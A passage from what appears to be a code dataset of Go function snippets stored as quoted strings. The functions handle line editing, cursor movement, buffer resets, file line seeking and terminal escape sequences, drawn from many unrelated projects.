curLine[i.cursorLinePos:]\n\ti.cursorLinePos--\n}", "func (ls *linestate) editMoveLeft() {\n\tif ls.pos > 0 {\n\t\tls.pos--\n\t\tls.refreshLine()\n\t}\n}", "func (w *VT100Writer) EraseStartOfLine() {\n\tw.WriteRaw([]byte{0x1b, '[', '1', 'K'})\n}", "func (t *Tailer) StartFromBeginning() error {\n\treturn t.Start(0, io.SeekStart)\n}", "func ClearLineStart() {\n\tfmt.Printf(\"\\033[1K\")\n}", "func ClearLineStart() {\n\tfmt.Printf(\"\\033[1K\")\n}", "func (tv *TextView) JumpToLine(ln int) {\n\twupdt := tv.TopUpdateStart()\n\ttv.SetCursorShow(TextPos{Ln: ln - 1})\n\ttv.SavePosHistory(tv.CursorPos)\n\ttv.TopUpdateEnd(wupdt)\n}", "func (w *IPWriter) SetCurrentLine(n uint) {\n\tw.currentLine = n\n}", "func (v *VerbalExpression) StartOfLine() *VerbalExpression {\n\tif !strings.HasPrefix(v.prefixes, \"^\") {\n\t\tv.prefixes = `^` + v.prefixes\n\t}\n\treturn v\n}", "func CursorNextLine(r uint) {\n\temitEscape(\"E\", r)\n}", "func (v *TextView) BackwardDisplayLineStart(iter *TextIter) bool {\n\treturn gobool(C.gtk_text_view_backward_display_line_start(v.native(), iter.native()))\n}", "func srcLine(src []byte, p token.Position) string {\n\t// Run to end of line in both directions if not at line start/end.\n\tlo, hi := p.Offset, p.Offset+1\n\tfor lo > 0 && src[lo-1] != '\\n' {\n\t\tlo--\n\t}\n\tfor hi < len(src) && src[hi-1] != '\\n' {\n\t\thi++\n\t}\n\treturn string(src[lo:hi])\n}", "func CursorPrevLine(r uint) {\n\temitEscape(\"F\", r)\n}", "func (file *File) SeekLine(lines int64, whence int) (int64, error) {\n\n\t// return error on bad whence\n\tif whence < 0 || whence > 2 {\n\t\treturn file.Seek(0, whence)\n\t}\n\n\tposition, err := file.Seek(0, whence)\n\n\tbuf := make([]byte, BufferLength)\n\tbufLen := 0\n\tlineSep := byte('\\n')\n\tseekBack := lines < 1\n\tlines = int64(math.Abs(float64(lines)))\n\tmatchCount := int64(0)\n\n\t// seekBack ignores first match\n\t// allows 0 to go to begining of current line\n\tif seekBack {\n\t\tmatchCount = -1\n\t}\n\n\tleftPosition := position\n\toffset := int64(BufferLength * -1)\n\n\tfor b := 1; ; b++ {\n\t\tif err != nil {\n\t\t\tbreak\n\t\t}\n\n\t\tif seekBack {\n\n\t\t\t// on seekBack 2nd buffer onward needs to seek\n\t\t\t// past what was just read plus another buffer size\n\t\t\tif b == 2 {\n\t\t\t\toffset *= 2\n\t\t\t}\n\n\t\t\t// if next seekBack will pass beginning of file\n\t\t\t// buffer is 0 to unread position\n\t\t\tif position+int64(offset) <= 0 {\n\t\t\t\tbuf = make([]byte, leftPosition)\n\t\t\t\tposition, err = file.Seek(0, io.SeekStart)\n\t\t\t\tleftPosition = 0\n\t\t\t} else {\n\t\t\t\tposition, err = file.Seek(offset, io.SeekCurrent)\n\t\t\t\tleftPosition = leftPosition - BufferLength\n\t\t\t}\n\t\t}\n\t\tif err != nil {\n\t\t\tbreak\n\t\t}\n\n\t\tbufLen, err = file.Read(buf)\n\t\tif err != nil {\n\t\t\tbreak\n\t\t} else if seekBack && leftPosition == 0 {\n\t\t\terr = io.EOF\n\t\t}\n\n\t\tfor i := 0; i < bufLen; i++ {\n\t\t\tiToCheck := i\n\t\t\tif seekBack {\n\t\t\t\tiToCheck = bufLen - i - 1\n\t\t\t}\n\t\t\tbyteToCheck := buf[iToCheck]\n\n\t\t\tif byteToCheck == lineSep {\n\t\t\t\tmatchCount++\n\t\t\t}\n\n\t\t\tif matchCount == lines {\n\t\t\t\tif seekBack {\n\t\t\t\t\treturn file.Seek(int64(i)*-1, io.SeekCurrent)\n\t\t\t\t}\n\t\t\t\treturn file.Seek(int64(bufLen*-1+i+1), io.SeekCurrent)\n\t\t\t}\n\t\t}\n\t}\n\n\tif err == io.EOF && !seekBack {\n\t\tposition, _ = file.Seek(0, io.SeekEnd)\n\t} else if err == io.EOF && seekBack {\n\t\tposition, _ = file.Seek(0, io.SeekStart)\n\n\t\t// no io.EOF err on SeekLine(0,0)\n\t\tif lines == 0 {\n\t\t\terr = nil\n\t\t}\n\t}\n\n\treturn position, err\n}", "func findBeginOfLine(r io.ReaderAt, offset int64) (first int64, err error) {\n\tfor i := offset; i >= 0; i-- {\n\t\tif i == 0 {\n\t\t\tfirst = 0\n\t\t\tbreak\n\t\t}\n\n\t\tbuf := make([]byte, 1)\n\t\tif _, err = r.ReadAt(buf, i); err != nil {\n\t\t\treturn\n\t\t}\n\n\t\tif i == offset && rune(buf[0]) == '\\n' {\n\t\t\tcontinue\n\t\t}\n\t\tif rune(buf[0]) == '\\n' {\n\t\t\tfirst = i + 1\n\t\t\tbreak\n\t\t}\n\t}\n\n\treturn\n}", "func (r *Render) BreakLine(buffer *Buffer) {\n\t// Erasing and Render\n\tcursor := runewidth.StringWidth(buffer.Document().TextBeforeCursor()) + runewidth.StringWidth(r.getCurrentPrefix())\n\tr.clear(cursor)\n\tr.renderPrefix()\n\tr.out.SetColor(r.inputTextColor, r.inputBGColor, false)\n\tr.out.WriteStr(buffer.Document().Text + \"\\n\")\n\tr.out.SetColor(DefaultColor, DefaultColor, false)\n\tdebug.AssertNoError(r.out.Flush())\n\tif r.breakLineCallback != nil {\n\t\tr.breakLineCallback(buffer.Document())\n\t}\n\n\tr.previousCursor = 0\n}", "func (b *Buffer) update() {\n\tb.NumLines = len(b.lines)\n}", "func (b *Buffer) Reset() {\n\tb.buf = b.buf[:0]\n}", "func (tv *TextView) CursorForward(steps int) {\n\twupdt := tv.TopUpdateStart()\n\tdefer tv.TopUpdateEnd(wupdt)\n\ttv.ValidateCursor()\n\torg := tv.CursorPos\n\tfor i := 0; i < steps; i++ {\n\t\ttv.CursorPos.Ch++\n\t\tif tv.CursorPos.Ch > tv.Buf.LineLen(tv.CursorPos.Ln) {\n\t\t\tif tv.CursorPos.Ln < tv.NLines-1 {\n\t\t\t\ttv.CursorPos.Ch = 0\n\t\t\t\ttv.CursorPos.Ln++\n\t\t\t} else {\n\t\t\t\ttv.CursorPos.Ch = tv.Buf.LineLen(tv.CursorPos.Ln)\n\t\t\t}\n\t\t}\n\t}\n\ttv.SetCursorCol(tv.CursorPos)\n\ttv.SetCursorShow(tv.CursorPos)\n\ttv.CursorSelect(org)\n}", "func (e *Editor) Line() (string, error) {\n\tif err := e.editReset(); err != nil {\n\t\treturn string(e.Buffer), err\n\t}\nline:\n\tfor {\n\t\tr, _, err := e.In.ReadRune()\n\t\tif err != nil {\n\t\t\treturn string(e.Buffer), err\n\t\t}\n\n\t\tswitch r {\n\t\tcase enter:\n\t\t\tbreak line\n\t\tcase ctrlC:\n\t\t\treturn string(e.Buffer), errors.New(\"try again\")\n\t\tcase backspace, ctrlH:\n\t\t\tif err := e.editBackspace(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlD:\n\t\t\tif len(e.Buffer) == 0 {\n\t\t\t\treturn string(e.Buffer), io.EOF\n\t\t\t}\n\n\t\t\tif err := e.editDelete(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlT:\n\t\t\tif err := e.editSwap(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlB:\n\t\t\tif err := e.editMoveLeft(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlF:\n\t\t\tif err := e.editMoveRight(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlP:\n\t\t\tif err := e.editHistoryPrev(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlN:\n\t\t\tif err := e.editHistoryNext(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlU:\n\t\t\tif err := e.editReset(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlK:\n\t\t\tif err := e.editKillForward(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlA:\n\t\t\tif err := e.editMoveHome(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlE:\n\t\t\tif err := e.editMoveEnd(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlL:\n\t\t\tif err := e.clearScreen(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\n\t\t\tif err := e.refreshLine(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase ctrlW:\n\t\t\tif err := e.editDeletePrevWord(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tcase esc:\n\t\t\tr, _, err := e.In.ReadRune()\n\t\t\tif err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\n\t\t\tswitch r {\n\t\t\tcase '[':\n\t\t\t\tr, _, err := e.In.ReadRune()\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t}\n\n\t\t\t\tswitch r {\n\t\t\t\tcase '0', '1', '2', '4', '5', '6', '7', '8', '9':\n\t\t\t\t\t_, _, err := e.In.ReadRune()\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\tcase '3':\n\t\t\t\t\tr, _, err := e.In.ReadRune()\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\n\t\t\t\t\tswitch r {\n\t\t\t\t\tcase '~':\n\t\t\t\t\t\tif err := e.editDelete(); err != nil {\n\t\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\tcase 'A':\n\t\t\t\t\tif err := e.editHistoryPrev(); err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\tcase 'B':\n\t\t\t\t\tif err := e.editHistoryNext(); err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\tcase 'C':\n\t\t\t\t\tif err := e.editMoveRight(); err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\tcase 'D':\n\t\t\t\t\tif err := e.editMoveLeft(); err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\tcase 'H':\n\t\t\t\t\tif err := e.editMoveHome(); err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\tcase 'F':\n\t\t\t\t\tif err := e.editMoveEnd(); err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\tcase 'O':\n\t\t\t\tr, _, err := e.In.ReadRune()\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t}\n\n\t\t\t\tswitch r {\n\t\t\t\tcase 'H':\n\t\t\t\t\tif err := e.editMoveHome(); err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\tcase 'F':\n\t\t\t\t\tif err := e.editMoveEnd(); err != nil {\n\t\t\t\t\t\treturn string(e.Buffer), err\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\tcase tab:\n\t\t\tif err := e.completeLine(); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\tdefault:\n\t\t\tif err := e.editInsert(r); err != nil {\n\t\t\t\treturn string(e.Buffer), err\n\t\t\t}\n\t\t}\n\t}\n\n\treturn string(e.Buffer), nil\n}", "func (r *reader) inc() {\n\tif r.s[r.p.Offset] == '\\n' {\n\t\tr.p.Line++\n\t\tr.p.Col = 0\n\t}\n\tr.p.Offset++\n\tr.p.Col++\n}", "func (l *lexer) readLines() error {\n\tl.reset()\n\tln, _, err := l.bufReader.ReadLine()\n\tif err != nil {\n\t\tlog.Printf(\"Error: bufio.ReadLine: %v\\n\", err)\n\t}\n\tl.currentLine = l.nextLine\n\tl.nextLine = strings.TrimSpace(string(ln))\n\treturn err\n}", "func (r *ride) unshiftLines() Line {\n\tline, lines := r.lines[0], r.lines[1:]\n\tr.lines = lines\n\treturn line\n}", "func (r *linesIterator) Reset() {\n\tr.file.Seek(0, os.SEEK_SET)\n\tr.scanner = bufio.NewScanner(r.file)\n}", "func (b *Buffer) Line(n int) string {\n\tif n >= len(b.lines) {\n\t\treturn \"\"\n\t}\n\treturn string(b.lines[n].data)\n}", "func (p *Buffer) Rewind() {\n\tp.index = 0\n}", "func (h *windowsAnsiEventHandler) scrollLine(columns int, position COORD, info *CONSOLE_SCREEN_BUFFER_INFO) error {\n\t// Copy from and clip to the scroll region (full buffer width)\n\tscrollRect := SMALL_RECT{\n\t\tTop: position.Y,\n\t\tBottom: position.Y,\n\t\tLeft: position.X,\n\t\tRight: info.Size.X - 1,\n\t}\n\n\t// Origin to which area should be copied\n\tdestOrigin := COORD{\n\t\tX: position.X - int16(columns),\n\t\tY: position.Y,\n\t}\n\n\tchar := CHAR_INFO{\n\t\tUnicodeChar: ' ',\n\t\tAttributes: h.attributes,\n\t}\n\n\tif err := ScrollConsoleScreenBuffer(h.fd, scrollRect, scrollRect, destOrigin, char); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (p *PKGBUILD) PrependBlankLine(recomputePositions ...bool) (ok bool) {\n\tp.atoms.PushFront(newLine())\n\tif len(recomputePositions) > 0 && recomputePositions[0] {\n\t\tp.RecomputePositions()\n\t}\n\tp.RecomputeInfos()\n\treturn true\n}", "func (v *TextView) StartsDisplayLine(iter *TextIter) bool {\n\treturn gobool(C.gtk_text_view_starts_display_line(v.native(), iter.native()))\n}", "func (b *Buffer) MoveLinesDown(start int, end int) {\n\t// 0 <= start < end < len(b.lines)\n\t// if end == len(b.lines), we can't do anything here because the\n\t// last line is unaccessible, FIXME\n\tif start < 0 || start >= end || end >= len(b.lines)-1 {\n\t\treturn // what to do? FIXME\n\t}\n\tb.Insert(\n\t\tLoc{0, start},\n\t\tb.Line(end)+\"\\n\",\n\t)\n\tend++\n\tb.Remove(\n\t\tLoc{0, end},\n\t\tLoc{0, end + 1},\n\t)\n}", "func (ls *linestate) completeLine() rune {\n\t// get a list of line completions\n\tlc := ls.ts.completionCallback(ls.String())\n\tif len(lc) == 0 {\n\t\t// no line completions\n\t\tbeep()\n\t\treturn KeycodeNull\n\t}\n\t// navigate and display the line completions\n\tstop := false\n\tidx := 0\n\tu := utf8{}\n\tvar r rune\n\tfor !stop {\n\t\tif idx < len(lc) {\n\t\t\t// save the line buffer\n\t\t\tsavedBuf := ls.buf\n\t\t\tsavedPos := ls.pos\n\t\t\t// show the completion\n\t\t\tls.buf = []rune(lc[idx])\n\t\t\tls.pos = len(ls.buf)\n\t\t\tls.refreshLine()\n\t\t\t// restore the line buffer\n\t\t\tls.buf = savedBuf\n\t\t\tls.pos = savedPos\n\t\t} else {\n\t\t\t// show the original buffer\n\t\t\tls.refreshLine()\n\t\t}\n\t\t// navigate through the completions\n\t\tr = u.getRune(ls.ifd, nil)\n\t\tif r == KeycodeNull {\n\t\t\t// error on read\n\t\t\tstop = true\n\t\t} else if r == KeycodeTAB {\n\t\t\t// loop through the completions\n\t\t\tidx = (idx + 1) % (len(lc) + 1)\n\t\t\tif idx == len(lc) {\n\t\t\t\tbeep()\n\t\t\t}\n\t\t} else if r == KeycodeESC {\n\t\t\t// could be an escape, could be an escape sequence\n\t\t\tif wouldBlock(ls.ifd, &timeout20ms) {\n\t\t\t\t// nothing more to read, looks like a single escape\n\t\t\t\t// re-show the original buffer\n\t\t\t\tif idx < len(lc) {\n\t\t\t\t\tls.refreshLine()\n\t\t\t\t}\n\t\t\t\t// don't pass the escape key back\n\t\t\t\tr = KeycodeNull\n\t\t\t} else {\n\t\t\t\t// probably an escape sequence\n\t\t\t\t// update the buffer and return\n\t\t\t\tif idx < len(lc) {\n\t\t\t\t\tls.buf = []rune(lc[idx])\n\t\t\t\t\tls.pos = len(ls.buf)\n\t\t\t\t}\n\t\t\t}\n\t\t\tstop = true\n\t\t} else {\n\t\t\t// update the buffer and return\n\t\t\tif idx < len(lc) {\n\t\t\t\tls.buf = []rune(lc[idx])\n\t\t\t\tls.pos = len(ls.buf)\n\t\t\t}\n\t\t\tstop = true\n\t\t}\n\t}\n\t// return the last rune read\n\treturn r\n}", "func (cur *cursor) invalidateAtStart() {\n\tcur.idx = -1\n}", "func (i *Input) Buffer() Buffer {\n\tbuf := i.Block.Buffer()\n\n\t// offset used to display the line numbers\n\ttextXOffset := 0\n\n\tbufferLines := i.lines[:]\n\tfirstLine := 0\n\tlastLine := i.innerArea.Dy()\n\tif i.IsMultiLine {\n\t\tif i.cursorLineIndex >= lastLine {\n\t\t\tfirstLine += i.cursorLineIndex - lastLine + 1\n\t\t\tlastLine += i.cursorLineIndex - lastLine + 1\n\t\t}\n\n\t\tif len(i.lines) < lastLine {\n\t\t\tbufferLines = i.lines[firstLine:]\n\t\t} else {\n\t\t\tbufferLines = i.lines[firstLine:lastLine]\n\t\t}\n\t}\n\n\tif i.ShowLineNo {\n\t\t// forcing space for up to 1K\n\t\tif lastLine < LINE_NO_MIN_SPACE {\n\t\t\ttextXOffset = len(strconv.Itoa(LINE_NO_MIN_SPACE)) + 2\n\t\t} else {\n\t\t\ttextXOffset = len(strconv.Itoa(lastLine)) + 2 // one space at the beginning and one at the end\n\t\t}\n\t}\n\n\ttext := strings.Join(bufferLines, NEW_LINE)\n\n\t// if the last line is empty then we add a fake space to make sure line numbers are displayed\n\tif len(bufferLines) > 0 && bufferLines[len(bufferLines)-1] == \"\" && i.ShowLineNo {\n\t\ttext += \" \"\n\t}\n\n\tfg, bg := i.TextFgColor, i.TextBgColor\n\tcs := i.TextBuilder.Build(text, fg, bg)\n\ty, x, n := 0, 0, 0\n\tlineNoCnt := 1\n\n\tfor n < len(cs) {\n\t\tw := cs[n].Width()\n\n\t\tif x == 0 && i.ShowLineNo {\n\t\t\tcurLineNoString := \" \" + strconv.Itoa(lineNoCnt) +\n\t\t\t\tstrings.Join(make([]string, textXOffset-len(strconv.Itoa(lineNoCnt))-1), \" \")\n\t\t\t//i.debugMessage = \"Line no: \" + curLineNoString\n\t\t\tcurLineNoRunes := i.TextBuilder.Build(curLineNoString, fg, bg)\n\t\t\tfor lineNo := 0; lineNo < len(curLineNoRunes); lineNo++ {\n\t\t\t\tbuf.Set(i.innerArea.Min.X+x+lineNo, i.innerArea.Min.Y+y, curLineNoRunes[lineNo])\n\t\t\t}\n\t\t\tlineNoCnt++\n\t\t}\n\n\t\tif cs[n].Ch == '\\n' {\n\t\t\ty++\n\t\t\tn++\n\t\t\tx = 0 // set x = 0\n\t\t\tcontinue\n\t\t}\n\t\tbuf.Set(i.innerArea.Min.X+x+textXOffset, i.innerArea.Min.Y+y, cs[n])\n\n\t\tn++\n\t\tx += w\n\t}\n\n\tcursorXOffset := i.X + textXOffset\n\tif i.BorderLeft {\n\t\tcursorXOffset++\n\t}\n\n\tcursorYOffset := i.Y// termui.TermHeight() - i.innerArea.Dy()\n\tif i.BorderTop {\n\t\tcursorYOffset++\n\t}\n\tif lastLine > i.innerArea.Dy() {\n\t\tcursorYOffset += i.innerArea.Dy() - 1\n\t} else {\n\t\tcursorYOffset += i.cursorLineIndex\n\t}\n\tif i.IsCapturing {\n\t\ti.CursorX = i.cursorLinePos+cursorXOffset\n\t\ti.CursorY = cursorYOffset\n\t\ttermbox.SetCursor(i.cursorLinePos+cursorXOffset, cursorYOffset)\n\t}\n\n\t/*\n\t\tif i.DebugMode {\n\t\t\tposition := fmt.Sprintf(\"%s li: %d lp: %d n: %d\", i.debugMessage, i.cursorLineIndex, i.cursorLinePos, len(i.lines))\n\n\t\t\tfor idx, char := range position {\n\t\t\t\tbuf.Set(i.innerArea.Min.X+i.innerArea.Dx()-len(position) + idx,\n\t\t\t\t\ti.innerArea.Min.Y+i.innerArea.Dy()-1,\n\t\t\t\t\tCell{Ch: char, Fg: i.TextFgColor, Bg: i.TextBgColor})\n\t\t\t}\n\t\t}\n\t*/\n\treturn buf\n}", "func (b *buffer) Line(content string, indent int) {\n\tb.Write(fmt.Sprintf(\"%s\\n\", content), indent)\n}", "func (s *scanner) returnBuffer(buf []byte) {\n\tif len(buf) < cap(buf) {\n\t\ts.bytesPrealloc = buf[len(buf):]\n\t}\n}", "func (f *File) AddLine(offset int) {\n\tx := index(offset)\n\tf.mutex.Lock()\n\tif i := len(f.lines); (i == 0 || f.lines[i-1] < x) && x < f.size {\n\t\tf.lines = append(f.lines, x)\n\t}\n\tf.mutex.Unlock()\n}", "func (s *BasemumpsListener) EnterLine(ctx *LineContext) {}", "func (b *eventBuffer) advanceHead() {\n\told := b.Head()\n\n\tnext := old.link.next.Load()\n\t// if the next item is nil replace it with a sentinel value\n\tif next == nil {\n\t\tnext = newSentinelItem()\n\t}\n\n\t// notify readers that old is being dropped\n\tclose(old.link.droppedCh)\n\n\t// store the next value to head\n\tb.head.Store(next)\n\n\t// If the old head is equal to the tail\n\t// update the tail value as well\n\tif old == b.Tail() {\n\t\tb.tail.Store(next)\n\t}\n\n\t// In the case of there being a sentinel item or advanceHead being called\n\t// on a sentinel item, only decrement if there are more than sentinel\n\t// values\n\tif atomic.LoadInt64(b.size) > 0 {\n\t\t// update the amount of events we have in the buffer\n\t\tatomic.AddInt64(b.size, -1)\n\t}\n}", "func (w *ScrollWidget) NextLine() error {\n\terr := MoveLines(w.view, w.current, w.max, 1)\n\tw.current = GetLine(w.view)\n\treturn err\n}", "func (d *Decoder) consumeLine() {\n\td.take(notNewline)\n\tif d.at(0) == '\\n' {\n\t\td.advance(1)\n\t\td.line++\n\t}\n\td.reset()\n\td.section = endSection\n}", "func (b *Buf) Reset() { b.b = b.b[:0] }", "func (t *TimeLine) Reset() {\n\tt.cursor = 0\n\tt.lastDelta = 0\n}", "func makeStartLine(formatter logFormatter, format string, args ...interface{}) *buffer {\n\tentry := makeUnstructuredEntry(\n\t\tcontext.Background(),\n\t\tseverity.UNKNOWN, /* header - ignored */\n\t\t0, /* header - ignored */\n\t\t2, /* depth */\n\t\ttrue, /* redactable */\n\t\tformat,\n\t\targs...)\n\tentry.header = true\n\tentry.tags = configTagsBuffer\n\treturn formatter.formatEntry(entry)\n}", "func (tv *TextView) JumpToLinePrompt() {\n\tgi.StringPromptDialog(tv.Viewport, \"\", \"Line no..\",\n\t\tgi.DlgOpts{Title: \"Jump To Line\", Prompt: \"Line Number to jump to\"},\n\t\ttv.This(), func(recv, send ki.Ki, sig int64, data interface{}) {\n\t\t\tdlg := send.(*gi.Dialog)\n\t\t\tif sig == int64(gi.DialogAccepted) {\n\t\t\t\tval := gi.StringPromptDialogValue(dlg)\n\t\t\t\tln, ok := kit.ToInt(val)\n\t\t\t\tif ok {\n\t\t\t\t\ttv.JumpToLine(int(ln))\n\t\t\t\t}\n\t\t\t}\n\t\t})\n\n}", "func (s *Basegff3Listener) EnterLine(ctx *LineContext) {}", "func (s *Store) NewLine(ln int, st string) {\n\tif ln <= 0 {\n\t\ts.lines = append([]*line{newLine(st)}, s.lines...)\n\t\treturn\n\t}\n\tif ln >= len(s.lines) {\n\t\ts.lines = append(s.lines, newLine(st))\n\t\treturn\n\t}\n\ts.lines = append(s.lines[:ln], append([]*line{newLine(st)}, s.lines[ln:]...)...)\n\tcs := s.undoFac()\n\tcs.AddLine(ln)\n\tcs.ChangeLine(ln+1, \"\", st)\n\ts.AddUndoSet(cs)\n\treturn\n}", "func (w *writer) addLine(p []byte) error {\n\tw.lines = CopyAndAppend(w.lines, p)\n\n\tif len(w.lines) >= ItemsPerMessage {\n\t\treturn w.flush()\n\t}\n\n\treturn nil\n}", "func (io *Io) NextLine() string {\n\tvar buffer []byte\n\tfor {\n\t\tline, isPrefix, err := io.reader.ReadLine()\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t\tbuffer = append(buffer, line...)\n\t\tif !isPrefix {\n\t\t\tbreak\n\t\t}\n\t}\n\treturn string(buffer)\n}", "func (_this *StreamingReadBuffer) Refill(position int) (positionOffset int) {\n\tif _this.isEOF {\n\t\treturn\n\t}\n\n\t_this.moveUnreadBytesToStart(position)\n\t_this.readFromReader(len(_this.Buffer))\n\tpositionOffset = -position\n\treturn\n}", "func (tb *TextBuf) Line(ln int) []rune {\n\ttb.LinesMu.RLock()\n\tdefer tb.LinesMu.RUnlock()\n\tif ln >= tb.NLines || ln < 0 {\n\t\treturn nil\n\t}\n\treturn tb.Lines[ln]\n}", "func (ls *linestate) editMoveEnd() {\n\tif ls.pos != len(ls.buf) {\n\t\tls.pos = len(ls.buf)\n\t\tls.refreshLine()\n\t}\n}", "func lineStart(f *token.File, line int) token.Pos {\n\t// Use binary search to find the start offset of this line.\n\t//\n\t// TODO(rstambler): eventually replace this function with the\n\t// simpler and more efficient (*go/token.File).LineStart, added\n\t// in go1.12.\n\n\tmin := 0 // inclusive\n\tmax := f.Size() // exclusive\n\tfor {\n\t\toffset := (min + max) / 2\n\t\tpos := f.Pos(offset)\n\t\tposn := f.Position(pos)\n\t\tif posn.Line == line {\n\t\t\treturn pos - (token.Pos(posn.Column) - 1)\n\t\t}\n\n\t\tif min+1 >= max {\n\t\t\treturn token.NoPos\n\t\t}\n\n\t\tif posn.Line < line {\n\t\t\tmin = offset\n\t\t} else {\n\t\t\tmax = offset\n\t\t}\n\t}\n}", "func (t *Tailer) Start(offset int64, whence int) error {\n\terr := t.setup(offset, whence)\n\tif err != nil {\n\t\tt.source.Status.Error(err)\n\t\treturn err\n\t}\n\tt.source.Status.Success()\n\tt.source.AddInput(t.path)\n\n\tgo t.forwardMessages()\n\tt.decoder.Start()\n\tgo t.readForever()\n\n\treturn nil\n}", "func (l *Lexer) Skip() {\n\t// We're at a point where we know we have completely read a\n\t// token. If we've read 90% of an l.buf's capacity, shift the\n\t// unread content to the start of the buffer. Otherwise just\n\t// move l.start to the current position.\n\tn := cap(l.buf)\n\tr := n - l.pos\n\tif n/10 >= r {\n\t\tl.buf, l.start, l.pos = append(l.buf[0:0], l.buf[l.pos:]...), 0, 0\n\t} else {\n\t\tl.start = l.pos\n\t}\n}", "func (lbw *LineBufferingWriter) Flush() error {\n\tlbw.bufferLock.Lock()\n\tdefer lbw.bufferLock.Unlock()\n\tif len(lbw.buf) == 0 {\n\t\treturn nil\n\t}\n\n\t_, err := lbw.wrappedWriter.Write(lbw.buf)\n\tif err != nil {\n\t\treturn err\n\t}\n\tlbw.buf = []byte{}\n\treturn nil\n}", "func (ls *linestate) refreshLine() {\n\tif ls.ts.mlmode {\n\t\tls.refreshMultiline()\n\t} else {\n\t\tls.refreshSingleline()\n\t}\n}", "func MoveTopLeft() {\n\tfmt.Print(\"\\033[H\")\n}", "func (p *PKGBUILD) InsertBlankLineBefore(info *atom.Info, recomputePositions ...bool) (ok bool) {\n\tif ok = p.ContainsInfo(info); ok {\n\t\tp.atoms.Insert(info.Index(), newLine())\n\t\tp.RecomputeInfos()\n\t\tif len(recomputePositions) > 0 && recomputePositions[0] {\n\t\t\tp.RecomputePositions()\n\t\t}\n\t}\n\treturn\n}", "func (s *BaseredcodeListener) EnterLine(ctx *LineContext) {}", "func (s *Statement) Line() *Statement {\n\tt := token{\n\t\ttyp: layoutToken,\n\t\tcontent: \"\\n\",\n\t}\n\t*s = append(*s, t)\n\treturn s\n}", "func (ep *ExpectProcess) ReadLine() string {\n\tep.mu.Lock()\n\tdefer ep.mu.Unlock()\n\tif ep.count > ep.cur {\n\t\tline := ep.lines[ep.cur]\n\t\tep.cur++\n\t\treturn line\n\t}\n\treturn \"\"\n}", "func (tail *Tail) RequestEmptyLine() {\n\ttail.rel = true\n}", "func CursorPrevLine(n int) {\n\tfmt.Printf(CSI+CursorPreviousLineSeq, n)\n}", "func (gc *LinearConverter) LineOffset() int {\n\treturn 0\n}", "func (src *Source) SetNewBuffer() {\n\tsrc.buf = make([]byte, 64)\n}", "func (x *Reader) BackToLastCompleteLine() error {\n\tif x.File == nil {\n\t\treturn nil\n\t}\n\treturn x.SeekOffset(x.Offset)\n}", "func Buffer() string {\n\treturn C.GoString(C.rl_line_buffer)\n}", "func (tr *testTalker) getLine() string {\n\tif len(tr.input) < 1 {\n\t\tpanic(\"getLine(): unexpected call to getLine, got no more input data.\")\n\t}\n\tinput := tr.input[0]\n\ttr.input = tr.input[1:]\n\treturn input\n}", "func readLine(reader *bufio.Reader) (line string, err error) {\n\tvar part []byte\n\tvar prefix bool\n\n\tbuffer := bytes.NewBuffer(make([]byte, 0))\n\tfor {\n\t\tif part, prefix, err = reader.ReadLine(); err != nil {\n\t\t\tbreak\n\t\t}\n\t\tbuffer.Write(part)\n\t\tif !prefix {\n\t\t\tline = buffer.String()\n\t\t\treturn\n\t\t}\n\t}\n\treturn\n}", "func (c *Cursor) Forward(n int) {\n\t(*c).Index += n\n}", "func (l *Lexer) swallow() {\n\tl.start = l.pos\n}", "func (m *Music) WaitLine() {\n\t<-m.linePlayed\n}", "func CursorNextLine(n int) {\n\tfmt.Printf(CSI+CursorNextLineSeq, n)\n}", "func (s *BaseGraffleParserListener) EnterSequence_line(ctx *Sequence_lineContext) {}", "func (b *Buffer) Reset() {\n\tb.writeCursor = 0\n\tb.written = 0\n}", "func (br *BufferedReader) Reset(r io.Reader) {\n\n\tbr.reader = 